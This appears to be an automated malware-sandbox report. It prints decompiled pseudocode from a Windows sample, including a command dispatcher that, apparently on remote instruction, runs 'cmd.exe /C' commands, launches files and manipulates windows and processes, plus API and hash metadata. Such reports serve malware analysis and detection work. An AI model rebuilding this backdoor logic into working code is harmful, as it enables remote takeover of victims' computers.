                                                                                                • Instruction Fuzzy Hash: 13614F309002099ACF14EBE1D8969EE7779AF5034CF20417FB506771E2EF786E4ACA59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0041212A() {
                                                                                                				intOrPtr _v8;
                                                                                                				CHAR* _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				CHAR* _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				CHAR* _v28;
                                                                                                				char _v296;
                                                                                                				char _v560;
                                                                                                				intOrPtr _t25;
                                                                                                				_Unknown_base(*)()* _t43;
                                                                                                				signed int _t53;
                                                                                                				struct HINSTANCE__* _t55;
                                                                                                				struct HINSTANCE__* _t58;
                                                                                                				void* _t61;
                                                                                                
                                                                                                				_v28 = "getaddrinfo";
                                                                                                				_v24 = E00411CE2;
                                                                                                				_v20 = "getnameinfo";
                                                                                                				_v16 = E00411F62;
                                                                                                				_v12 = "freeaddrinfo";
                                                                                                				_v8 = E00411CA4;
                                                                                                				if( *0x46fcf4 == 0) {
                                                                                                					if(GetSystemDirectoryA( &_v560, 0x104) != 0) {
                                                                                                						E0043CAAC( &_v296, 0x10c,  &_v560);
                                                                                                						E0043CB06( &_v296, 0x10c, "\\ws2_32");
                                                                                                						_t58 = LoadLibraryA( &_v296);
                                                                                                						_t55 = 0;
                                                                                                						if(_t58 == 0) {
                                                                                                							L6:
                                                                                                							E0043CAAC( &_v296, 0x10c,  &_v560);
                                                                                                							E0043CB06( &_v296, 0x10c, "\\wship6");
                                                                                                							_t58 = LoadLibraryA( &_v296);
                                                                                                							if(_t58 != 0) {
                                                                                                								if(GetProcAddress(_t58, "getaddrinfo") == 0) {
                                                                                                									FreeLibrary(_t58);
                                                                                                									_t58 = _t55;
                                                                                                								}
                                                                                                								if(_t58 != 0) {
                                                                                                									goto L10;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							if(GetProcAddress(_t58, "getaddrinfo") == 0) {
                                                                                                								FreeLibrary(_t58);
                                                                                                								_t58 = 0;
                                                                                                							}
                                                                                                							if(_t58 != 0) {
                                                                                                								L10:
                                                                                                								_t53 = _t55;
                                                                                                								while(1) {
                                                                                                									_t43 = GetProcAddress(_t58,  *(_t61 + _t53 * 8 - 0x18));
                                                                                                									 *(_t61 + _t53 * 8 - 0x14) = _t43;
                                                                                                									if(_t43 == 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									_t53 = _t53 + 1;
                                                                                                									if(_t53 < 3) {
                                                                                                										continue;
                                                                                                									} else {
                                                                                                									}
                                                                                                									L15:
                                                                                                									if(_t58 != 0) {
                                                                                                										do {
                                                                                                											 *((intOrPtr*)(_t55 + 0x46c9ec)) =  *((intOrPtr*)(_t61 + _t55 - 0x14));
                                                                                                											_t55 = _t55 + 8;
                                                                                                										} while (_t55 < 0x18);
                                                                                                									}
                                                                                                									goto L17;
                                                                                                								}
                                                                                                								FreeLibrary(_t58);
                                                                                                								_t58 = _t55;
                                                                                                								goto L15;
                                                                                                							} else {
                                                                                                								goto L6;
                                                                                                							}
                                                                                                						}
                                                                                                						L17:
                                                                                                					}
                                                                                                					 *0x46fcf4 = 1;
                                                                                                				}
                                                                                                				_t25 =  *0x46c9ec; // 0x411ce2
                                                                                                				return _t25;
                                                                                                			}


                                                                                                APIs
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00412176
                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 004121BC
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004121D6
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00000000,00000000), ref: 004121E1
                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041221E
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00412230
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041223B
                                                                                                • GetProcAddress.KERNEL32(00000000,004668A0), ref: 0041224A
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00412261
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                • String ID: \ws2_32$\wship6$getaddrinfo
                                                                                                • API String ID: 2490988753-3078833738
                                                                                                • Opcode ID: 457d837b0b855f760349e9f5aa46f248d228e9f14f6977d881541a4667a72e94
                                                                                                • Instruction ID: 8ba9de9ea38a74fad0edb80c0d42514c3cf7ca3bba8c170231fc23d52f74bd2b
                                                                                                • Opcode Fuzzy Hash: 457d837b0b855f760349e9f5aa46f248d228e9f14f6977d881541a4667a72e94
                                                                                                • Instruction Fuzzy Hash: DF319A72D02229A7CB10EB60DD88EDF76ACAF48705F1101A3ED04E7251E778DA948BDD
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E00412DBE(void* __ebx, CHAR* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a44) {
                                                                                                				char _v5;
                                                                                                				char _v140;
                                                                                                				char _v144;
                                                                                                				char _v164;
                                                                                                				char _v180;
                                                                                                				char _v188;
                                                                                                				void* _v196;
                                                                                                				char _v216;
                                                                                                				void* _v220;
                                                                                                				char _v236;
                                                                                                				char _v240;
                                                                                                				void* _v244;
                                                                                                				char _v264;
                                                                                                				void* _v268;
                                                                                                				char _v276;
                                                                                                				char _v288;
                                                                                                				void* _v292;
                                                                                                				void* _v308;
                                                                                                				char _v312;
                                                                                                				void* _v316;
                                                                                                				char _v328;
                                                                                                				char _v332;
                                                                                                				char _v336;
                                                                                                				char* _v344;
                                                                                                				char _v348;
                                                                                                				char _v368;
                                                                                                				char _v372;
                                                                                                				char _v376;
                                                                                                				char _v384;
                                                                                                				char _v392;
                                                                                                				long _v396;
                                                                                                				int _v400;
                                                                                                				char _v408;
                                                                                                				char _v420;
                                                                                                				char _v424;
                                                                                                				void* _v428;
                                                                                                				int _v432;
                                                                                                				char _v436;
                                                                                                				char _v440;
                                                                                                				char _v444;
                                                                                                				char _v448;
                                                                                                				char _v452;
                                                                                                				char _v456;
                                                                                                				char _v460;
                                                                                                				char _v464;
                                                                                                				char _v468;
                                                                                                				char _v476;
                                                                                                				char _v524;
                                                                                                				char _v528;
                                                                                                				void* _t246;
                                                                                                				void* _t248;
                                                                                                				intOrPtr _t376;
                                                                                                				intOrPtr _t377;
                                                                                                				void* _t378;
                                                                                                				void* _t380;
                                                                                                				signed int _t381;
                                                                                                				signed int _t387;
                                                                                                				void* _t390;
                                                                                                				void* _t391;
                                                                                                				void* _t392;
                                                                                                				void* _t396;
                                                                                                				void* _t402;
                                                                                                
                                                                                                				_t401 = __eflags;
                                                                                                				_t362 = __edx;
                                                                                                				_t296 = __ebx;
                                                                                                				_push(__ebx);
                                                                                                				_t376 = _a4;
                                                                                                				E004020DE(__ebx,  &_v332, __edx, __eflags, _t376 + 0xc);
                                                                                                				SetEvent( *(_t376 + 0x24));
                                                                                                				_t377 =  *((intOrPtr*)(E00401F87( &_v336)));
                                                                                                				E00404287( &_v336,  &_v312, 4, 0xffffffff);
                                                                                                				_t390 = (_t387 & 0xfffffff8) - 0x1a4;
                                                                                                				E004020DE(__ebx, _t390, _t362, _t401, 0x46e250);
                                                                                                				_t391 = _t390 - 0x18;
                                                                                                				E004020DE(__ebx, _t391, _t362, _t401,  &_v328);
                                                                                                				E00417E68( &_v468, _t362);
                                                                                                				_t392 = _t391 + 0x30;
                                                                                                				_t402 = _t377 - 0x8f;
                                                                                                				if(_t402 > 0) {
                                                                                                					_t378 = _t377 + 0xffffff70;
                                                                                                					__eflags = _t378 - 0x22;
                                                                                                					if(__eflags <= 0) {
                                                                                                						switch( *((intOrPtr*)(( *(_t378 + 0x413f3e) & 0x000000ff) * 4 +  &M00413EF2))) {
                                                                                                							case 0:
                                                                                                								__ecx =  &_v444;
                                                                                                								__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                								__eax = E00401F87(__ecx);
                                                                                                								__ecx = __eax;
                                                                                                								__eax = E00407FC3(__ecx);
                                                                                                								goto L127;
                                                                                                							case 1:
                                                                                                								__ecx =  &_v444;
                                                                                                								__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                								__eax = E00401F87(__eax);
                                                                                                								__eax = StrToIntA(__eax);
                                                                                                								__ecx =  &_v448;
                                                                                                								__edi = __eax;
                                                                                                								__ecx = E00401E3B( &_v448, __edx, __eflags, 1);
                                                                                                								__eax = E00401F87(__eax);
                                                                                                								__dl = 0x30;
                                                                                                								__ecx =  &_v432;
                                                                                                								__eax = E00418A4B( &_v432, __edx, __eax);
                                                                                                								__ecx =  &_v432;
                                                                                                								__eax = E00401EDD( &_v432);
                                                                                                								__ecx =  &_v452;
                                                                                                								__esi = __eax;
                                                                                                								__eax = E00401E3B( &_v452, __edx, __eflags, 2);
                                                                                                								__esp = __esp - 0x18;
                                                                                                								__ecx = __esp;
                                                                                                								__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
                                                                                                								__ecx = __esi;
                                                                                                								__eax = E0041843E(__esi);
                                                                                                								__esp = __esp + 0x18;
                                                                                                								__ecx =  &_v440;
                                                                                                								__edx = E00401EDD( &_v440);
                                                                                                								__ecx = __edi;
                                                                                                								__eax = E00418900(__edi, __edx);
                                                                                                								goto L107;
                                                                                                							case 2:
                                                                                                								__ecx =  &_v444;
                                                                                                								__ecx = E00401E3B( &_v444, __edx, __eflags, 1);
                                                                                                								__eax = E00401F87(__eax);
                                                                                                								__ecx =  &_v448;
                                                                                                								__ecx = E00401E3B( &_v448, __edx, __eflags, 0);
                                                                                                								__eax = E00401F87(__ecx);
                                                                                                								__eax = SetWindowTextW(__eax, __eax);
                                                                                                								goto L20;
                                                                                                							case 3:
                                                                                                								__ecx =  &_v444;
                                                                                                								__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                								__esp = __esp - 0x18;
                                                                                                								__ecx = __esp;
                                                                                                								__eax = E00413F72(__ebx, __edx);
                                                                                                								goto L104;
                                                                                                							case 4:
                                                                                                								__ecx =  &_v444;
                                                                                                								__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                								__esp = __esp - 0x18;
                                                                                                								__ecx = __esp;
                                                                                                								__eax = E00414091(__ecx, __edi, __eflags);
                                                                                                								goto L104;
                                                                                                							case 5:
                                                                                                								E004020DE(__ebx, _t392 - 0x18, _t362, __eflags, E00401E3B( &_v444, _t362, __eflags, 0));
                                                                                                								E00406AA1(_t296, _t362);
                                                                                                								goto L104;
                                                                                                							case 6:
                                                                                                								__ecx =  &_v444;
                                                                                                								__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                								__esp = __esp - 0x18;
                                                                                                								__ecx = __esp;
                                                                                                								__eax = E00415D7B(__ebx, __edx);
                                                                                                								goto L104;
                                                                                                							case 7:
                                                                                                								__ecx =  &_v444;
                                                                                                								__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                								__esp = __esp - 0x18;
                                                                                                								__ecx = __esp;
                                                                                                								__eax = E00404005(__ebx, __edx, __eflags);
                                                                                                								goto L104;
                                                                                                							case 8:
                                                                                                								__eax = E00417043(__ebx);
                                                                                                								goto L127;
                                                                                                							case 9:
                                                                                                								__eax = E00417171(__ebx, __eflags);
                                                                                                								goto L127;
                                                                                                							case 0xa:
                                                                                                								__eax = E004171B0(__eax);
                                                                                                								goto L127;
                                                                                                							case 0xb:
                                                                                                								__ebx = 0;
                                                                                                								__ecx =  &_v444;
                                                                                                								__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                								__eax = E004052CF(0);
                                                                                                								__ecx =  &_v452;
                                                                                                								__eflags =  *__eax - __bl;
                                                                                                								__ebx = 0 | __eflags != 0x00000000;
                                                                                                								__eax = E00401E3B( &_v452, __edx, __eflags, 1);
                                                                                                								__dl = __bl;
                                                                                                								__ecx = __eax;
                                                                                                								__eax = E00417150(__ecx, __edx, __edi, __esi);
                                                                                                								goto L127;
                                                                                                							case 0xc:
                                                                                                								__eax = E004171B8(__edx);
                                                                                                								goto L127;
                                                                                                							case 0xd:
                                                                                                								__eax = E00406114(__ebx, __ecx, __edx);
                                                                                                								__ecx =  &_v444;
                                                                                                								__esi = __eax;
                                                                                                								__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                								__esp = __esp - 0x18;
                                                                                                								__ecx =  &_v372;
                                                                                                								__edi = __esp;
                                                                                                								__edx = __esi;
                                                                                                								__edx = E00417C16(__ebx,  &_v372, __esi);
                                                                                                								__ecx =  &_v396;
                                                                                                								__edx = __eax;
                                                                                                								__ecx = __edi;
                                                                                                								__eax = E00402F85(__ebx, __edi, __edx, __eflags, __eax);
                                                                                                								_push(0xab);
                                                                                                								goto L126;
                                                                                                							case 0xe:
                                                                                                								__eflags =  *0x46daf7;
                                                                                                								if( *0x46daf7 != 0) {
                                                                                                									ShowWindow( *0x46e0ac, 9) = SetForegroundWindow( *0x46e0ac);
                                                                                                								} else {
                                                                                                									__cl = 1;
                                                                                                									__eax = E004199B8(__ebx, __ecx, __edx);
                                                                                                									__ebx = 0;
                                                                                                									__eax = CreateThread(0, 0, E00419787, 0, 0, 0);
                                                                                                									 *0x46daf7 = 2;
                                                                                                								}
                                                                                                								goto L127;
                                                                                                							case 0xf:
                                                                                                								_push(5);
                                                                                                								goto L16;
                                                                                                							case 0x10:
                                                                                                								__ebx = 0;
                                                                                                								_push(0);
                                                                                                								_push(0);
                                                                                                								goto L17;
                                                                                                							case 0x11:
                                                                                                								__ecx =  &_v140;
                                                                                                								__eax = E00407456( &_v140);
                                                                                                								__ecx =  &_v444;
                                                                                                								__eax = E00401E3B( &_v444, __edx, __eflags, 2);
                                                                                                								__esp = __esp - 0x18;
                                                                                                								__ecx = __esp;
                                                                                                								__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
                                                                                                								__ecx =  &_v452;
                                                                                                								__eax = E00401E3B( &_v452, __edx, __eflags, 1);
                                                                                                								__esp = __esp - 0x18;
                                                                                                								__ecx = __esp;
                                                                                                								__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
                                                                                                								__ecx =  &_v460;
                                                                                                								__eax = E00401E3B( &_v460, __edx, __eflags, 0);
                                                                                                								__esp = __esp - 0x18;
                                                                                                								__ecx = __esp;
                                                                                                								__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
                                                                                                								__ecx =  &_v164;
                                                                                                								__eax = E00405D7F(__ebx,  &_v164);
                                                                                                								__ecx =  &_v236;
                                                                                                								__eax = E00407464();
                                                                                                								goto L127;
                                                                                                							case 0x12:
                                                                                                								goto L127;
                                                                                                						}
                                                                                                					}
                                                                                                					goto L127;
                                                                                                				} else {
                                                                                                					if(_t402 == 0) {
                                                                                                						L134();
                                                                                                						_v348 = E004374E4(_t239, E00401F87(E00401E3B( &_v444, _t362, __eflags, 2)));
                                                                                                						_v344 =  &_v144;
                                                                                                						E004143C2(__ebx, _t362, 0x46e250, __eflags,  &_v348);
                                                                                                						_t123 = E0040809D() - 1; // -1
                                                                                                						_t380 = _t123;
                                                                                                						_t246 = E00401E3B( &_v452, _t362, __eflags, 3);
                                                                                                						_t396 = _t392 - 0x18;
                                                                                                						E004020DE(_t296, _t396, _t362, __eflags, _t246);
                                                                                                						_t248 = E00401E3B( &_v460, _t362, __eflags, 2);
                                                                                                						E004020DE(_t296, _t396 - 0x18, _t362, __eflags, _t248);
                                                                                                						E00404260(_t296, _t396, E00401F87(E00401E3B( &_v468, _t362, __eflags, 1)));
                                                                                                						E00404260(_t296, _t396 - 0xffffffffffffffe8, E00401F87(E00401E3B( &_v476, _t362, __eflags, 0)));
                                                                                                						E0040783D( &_v180, _t362, __eflags);
                                                                                                						__eflags = _v276;
                                                                                                						if(_v276 == 0) {
                                                                                                							E0040804A( &_v444,  *((intOrPtr*)(E00408029(E004080B1( &_v180,  &_v528),  &_v524, _t380))));
                                                                                                						}
                                                                                                						E0040801E();
                                                                                                						goto L127;
                                                                                                					} else {
                                                                                                						_t381 = _t377 - 1;
                                                                                                						if(_t381 > 0x33) {
                                                                                                							L127:
                                                                                                							E00401E66( &_v444, _t362);
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                							return 0;
                                                                                                						} else {
                                                                                                							switch( *((intOrPtr*)(_t381 * 4 +  &M00413E22))) {
                                                                                                								case 0:
                                                                                                									_t265 = E00417C16(0,  &_v392, GetTickCount());
                                                                                                									_t267 = E00417C16(0,  &_v368, E00417BC6( &_v392));
                                                                                                									_t269 = E00417D8C(0,  &_v188, E00417B8C( &_v164));
                                                                                                									_t371 = E00402F85(0,  &_v428, E00402F0F( &_v288, E00402F85(0,  &_v264, E00402F0F( &_v240, E00402FA9( &_v216, E00401E3B( &_v444, _t268, _t403, 0), 0x46e250), _t269), _t403, 0x46e250), _t267), _t403, 0x46e250);
                                                                                                									E00402F0F(_t392 - 0x18, _t275, _t265);
                                                                                                									_push(0x4c);
                                                                                                									E00404BB7(0, 0x46e848, _t275, _t403);
                                                                                                									E00401FB9();
                                                                                                									E00401FB9();
                                                                                                									E00401FB9();
                                                                                                									E00401FB9();
                                                                                                									E00401FB9();
                                                                                                									E00401FB9();
                                                                                                									E00401EE2();
                                                                                                									E00401FB9();
                                                                                                									E00401FB9();
                                                                                                									_t289 = E004374E4(_t287, E00401F87(E00401E3B( &_v476, _t275, _t403, 1)));
                                                                                                									if(_t289 == 0) {
                                                                                                										E00401E3B( &_v464, _t371, __eflags, 0);
                                                                                                										_t362 = "0";
                                                                                                										_t291 = E00405C1B("0");
                                                                                                										__eflags = _t291;
                                                                                                										if(_t291 != 0) {
                                                                                                											_push(0);
                                                                                                											_t360 = 0x46e848;
                                                                                                											goto L10;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t362 = _t289 + _t289;
                                                                                                										if(E004047EB(0x46e848) == 0) {
                                                                                                											E00405038(0x46e848, _t362, 1);
                                                                                                										} else {
                                                                                                											E004050DB(0x46e250, _t362);
                                                                                                										}
                                                                                                									}
                                                                                                									goto L127;
                                                                                                								case 1:
                                                                                                									_push(0);
                                                                                                									__ecx = 0x46e848;
                                                                                                									L10:
                                                                                                									E004051C8(_t360, _t362);
                                                                                                									goto L127;
                                                                                                								case 2:
                                                                                                									__ecx =  &_v392;
                                                                                                									__eax = E004185F5(__ebx,  &_v392);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__edx = __eax;
                                                                                                									__ecx = __esp;
                                                                                                									__eax = E00417D8C(__ebx, __esp, __edx);
                                                                                                									_push(0x33);
                                                                                                									__ecx = 0x46e848;
                                                                                                									__eax = E00404BB7(__ebx, 0x46e848, __edx, __eflags);
                                                                                                									__ecx =  &_v420;
                                                                                                									goto L108;
                                                                                                								case 3:
                                                                                                									goto L127;
                                                                                                								case 4:
                                                                                                									 &_v400 = GetCurrentProcessId();
                                                                                                									__eax = E0043CDA6(__ecx, __eax,  &_v400, 0xa);
                                                                                                									__esp = __esp - 0xc;
                                                                                                									__eax =  &_v400;
                                                                                                									__esi = __esp;
                                                                                                									__ecx =  &_v368;
                                                                                                									__edx = E0040D25B(__ebx,  &_v368, __eflags);
                                                                                                									__ecx =  &_v392;
                                                                                                									__edx = __eax;
                                                                                                									__ecx = __esi;
                                                                                                									__eax = E004076BB(__ebx, __esi, __edx, __edi, __eflags,  &_v400);
                                                                                                									_push(0x4f);
                                                                                                									goto L126;
                                                                                                								case 5:
                                                                                                									__ecx =  &_v444;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__eax = E00401F87(__ecx);
                                                                                                									__ecx = __eax;
                                                                                                									__eax = E00417BE9(__ecx);
                                                                                                									goto L127;
                                                                                                								case 6:
                                                                                                									L20:
                                                                                                									__eax = E00414318(__edx);
                                                                                                									goto L127;
                                                                                                								case 7:
                                                                                                									__ecx =  &_v444;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__eax = E00401F87(__ecx);
                                                                                                									__eax = CloseWindow(__eax);
                                                                                                									goto L127;
                                                                                                								case 8:
                                                                                                									_push(3);
                                                                                                									goto L16;
                                                                                                								case 9:
                                                                                                									_push(9);
                                                                                                									L16:
                                                                                                									_push(0);
                                                                                                									L17:
                                                                                                									__ecx =  &_v444;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags);
                                                                                                									__eax = E00401F87(__ecx);
                                                                                                									__eax = ShowWindow(__eax, ??);
                                                                                                									goto L127;
                                                                                                								case 0xa:
                                                                                                									__eax =  &_v396;
                                                                                                									__ecx =  &_v444;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__eax = E00401F87(__ecx);
                                                                                                									__eax = GetWindowThreadProcessId(__eax,  &_v396);
                                                                                                									__ecx = _v400;
                                                                                                									__eax = E00417BE9(_v400);
                                                                                                									goto L20;
                                                                                                								case 0xb:
                                                                                                									__ebx = 0;
                                                                                                									__ecx =  &_v444;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__eax = E00401F87(__eax);
                                                                                                									__ecx =  &_v372;
                                                                                                									__eax = E00404260(0,  &_v372, __eax);
                                                                                                									__edx = L"/C ";
                                                                                                									__ecx =  &_v400;
                                                                                                									__ecx = __eax;
                                                                                                									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
                                                                                                									__ecx =  &_v400;
                                                                                                									__eax = E00401EE2();
                                                                                                									__ecx =  &_v376;
                                                                                                									goto L108;
                                                                                                								case 0xc:
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 1);
                                                                                                									__ecx = 0x46e300;
                                                                                                									__eax = E00401F9F(0x46e300, __eax);
                                                                                                									__eflags =  *0x46dad7 - __bl; // 0x0
                                                                                                									if(__eflags == 0) {
                                                                                                										__ecx =  &_v444;
                                                                                                										__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                										__esp = __esp - 0x18;
                                                                                                										__ecx = __esp;
                                                                                                										__eax = E004057A3();
                                                                                                										goto L104;
                                                                                                									}
                                                                                                									goto L127;
                                                                                                								case 0xd:
                                                                                                									__ebx = 0;
                                                                                                									__ecx =  &_v444;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									E00401F87(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
                                                                                                									goto L127;
                                                                                                								case 0xe:
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__ecx = 0x46e960;
                                                                                                									__eax = E00401F9F(0x46e960, __eax);
                                                                                                									__ecx =  &_v452;
                                                                                                									__ecx = E00401E3B( &_v452, __edx, __eflags, 3);
                                                                                                									__eax = E00401F87(__ecx);
                                                                                                									__esi = __eax;
                                                                                                									__eax = E00414F1D(__edx, __edi, __eax);
                                                                                                									__ecx =  &_v456;
                                                                                                									__ecx = E00401E3B( &_v456, __edx, __eflags, 2);
                                                                                                									__eax = E00401F87(__ecx);
                                                                                                									__eax = E004374E4(__ecx, __eax);
                                                                                                									__eflags = __eax;
                                                                                                									__ecx =  &_v460;
                                                                                                									_t57 = __eax != 0;
                                                                                                									__eflags = _t57;
                                                                                                									__ebx = 0 | _t57;
                                                                                                									__ecx = E00401E3B( &_v460, __edx, _t57, 1);
                                                                                                									E00401F87(__ecx) = E004374E4(__ecx, __eax);
                                                                                                									__dl = __bl;
                                                                                                									__cl = __al;
                                                                                                									__eax = E00414F9A(__ecx, __edx, __eflags, __esi);
                                                                                                									goto L26;
                                                                                                								case 0xf:
                                                                                                									 *0x46dd5e = 1;
                                                                                                									__eax = __eax + 0x46dd5e;
                                                                                                									__ecx = __ecx + __ebp;
                                                                                                									__eflags = __ecx;
                                                                                                									return 0x8f;
                                                                                                									__eax = __eax |  *__eax;
                                                                                                									 *__edx =  *__edx + __ch;
                                                                                                									__eflags =  *__edx;
                                                                                                									goto L127;
                                                                                                								case 0x10:
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx = __esp;
                                                                                                									__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
                                                                                                									__ecx = 0x46e3b0;
                                                                                                									__eax = E004085C0(0x46e3b0, __edx);
                                                                                                									goto L127;
                                                                                                								case 0x11:
                                                                                                									__ecx = 0x46e3b0;
                                                                                                									__eax = E004093D2(0x46e3b0);
                                                                                                									goto L127;
                                                                                                								case 0x12:
                                                                                                									__ecx = 0x46e3b0;
                                                                                                									__eax = E00409535(__ebx, 0x46e3b0);
                                                                                                									goto L127;
                                                                                                								case 0x13:
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__ecx = 0x46e440;
                                                                                                									__eax = E00401F9F(0x46e440, __eax);
                                                                                                									__ecx = 0x46e3b0;
                                                                                                									goto L34;
                                                                                                								case 0x14:
                                                                                                									 *0x46dd60 =  *0x46dd60 + 1;
                                                                                                									__eflags =  *0x46dd60;
                                                                                                									__eflags = __eax;
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx = __esp;
                                                                                                									__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
                                                                                                									__ecx = 0x46e3b0;
                                                                                                									__eax = E00409026(__ebx, 0x46e3b0, __eflags);
                                                                                                									goto L37;
                                                                                                								case 0x15:
                                                                                                									__esi = 0x46e3b0;
                                                                                                									__ecx = 0x46e3b0;
                                                                                                									__eax = E00409D6B(0x46e3b0);
                                                                                                									__ecx = 0x46e3b0;
                                                                                                									L34:
                                                                                                									__eax = E00408ED4(__ebx, __ecx);
                                                                                                									goto L127;
                                                                                                								case 0x16:
                                                                                                									__eflags =  *0x46daed - __bl;
                                                                                                									asm("sbb eax, 0x46daed");
                                                                                                									if(__eflags == 0) {
                                                                                                										__edx = 0;
                                                                                                										__cl = 0;
                                                                                                										__eax = E0040A6AE(0);
                                                                                                									}
                                                                                                									goto L127;
                                                                                                								case 0x17:
                                                                                                									__ebx = 0;
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__edi = 0x46e1b8;
                                                                                                									__ecx = 0x46e1b8;
                                                                                                									__eax = E00401F9F(0x46e1b8, __eax);
                                                                                                									__esi = 0x46e1d0;
                                                                                                									__ecx = 0x46e1d0;
                                                                                                									__eax = E00404943(0x46e1d0);
                                                                                                									__ecx = 0x46e1d0;
                                                                                                									__eax = E004049DE(0x46e1d0, 0x46e1d0, 0x46e1d0);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx = __esp;
                                                                                                									_push(0x46e1b8);
                                                                                                									__eflags =  *0x46daaa - __bl; // 0x0
                                                                                                									if(__eflags == 0) {
                                                                                                										__eax = E004020DE(0, __ecx, __edx, __eflags);
                                                                                                									} else {
                                                                                                										__eax = E004020DE(0, __ecx, __edx, __eflags);
                                                                                                									}
                                                                                                									__ecx = __esi;
                                                                                                									__eax = E00404BB7(__ebx, __esi, __edx, __eflags);
                                                                                                									__ecx = __esi;
                                                                                                									__eax = E00404D05(__ecx, __edx, 0x404519, __ebx);
                                                                                                									goto L127;
                                                                                                								case 0x18:
                                                                                                									__eax =  *0x46dac0();
                                                                                                									__ecx = 0x46e1d0;
                                                                                                									__eax = E00404F18(0x46e1d0, __edx);
                                                                                                									goto L127;
                                                                                                								case 0x19:
                                                                                                									__ebx = 0;
                                                                                                									__ecx =  &_v444;
                                                                                                									 *0x46da74 = __bl;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 3);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx = __esp;
                                                                                                									__eax = E004020DE(0, __esp, __edx, __eflags, __eax);
                                                                                                									__ecx =  &_v452;
                                                                                                									__ecx = E00401E3B( &_v452, __edx, __eflags, 2);
                                                                                                									__eax = E00401F87(__ecx);
                                                                                                									_push(__eax);
                                                                                                									__ecx =  &_v456;
                                                                                                									__ecx = E00401E3B( &_v456, __edx, __eflags, 1);
                                                                                                									__eax = E00401F87(__ecx);
                                                                                                									__eax = E004374E4(__ecx, __eax);
                                                                                                									__ecx =  &_v460;
                                                                                                									__esi = __eax;
                                                                                                									__ecx = E00401E3B( &_v460, __edx, __eflags, 0);
                                                                                                									__eax = E00401F87(__ecx);
                                                                                                									__eax = E004374E4(__ecx, __eax);
                                                                                                									__edx = __esi;
                                                                                                									__ecx = __eax;
                                                                                                									__eax = E004016F8(__ecx, __edx, __edi, __esi);
                                                                                                									goto L127;
                                                                                                								case 0x1a:
                                                                                                									_push( *0x46dab8);
                                                                                                									__eax = __eax ^ 0x0046dab8;
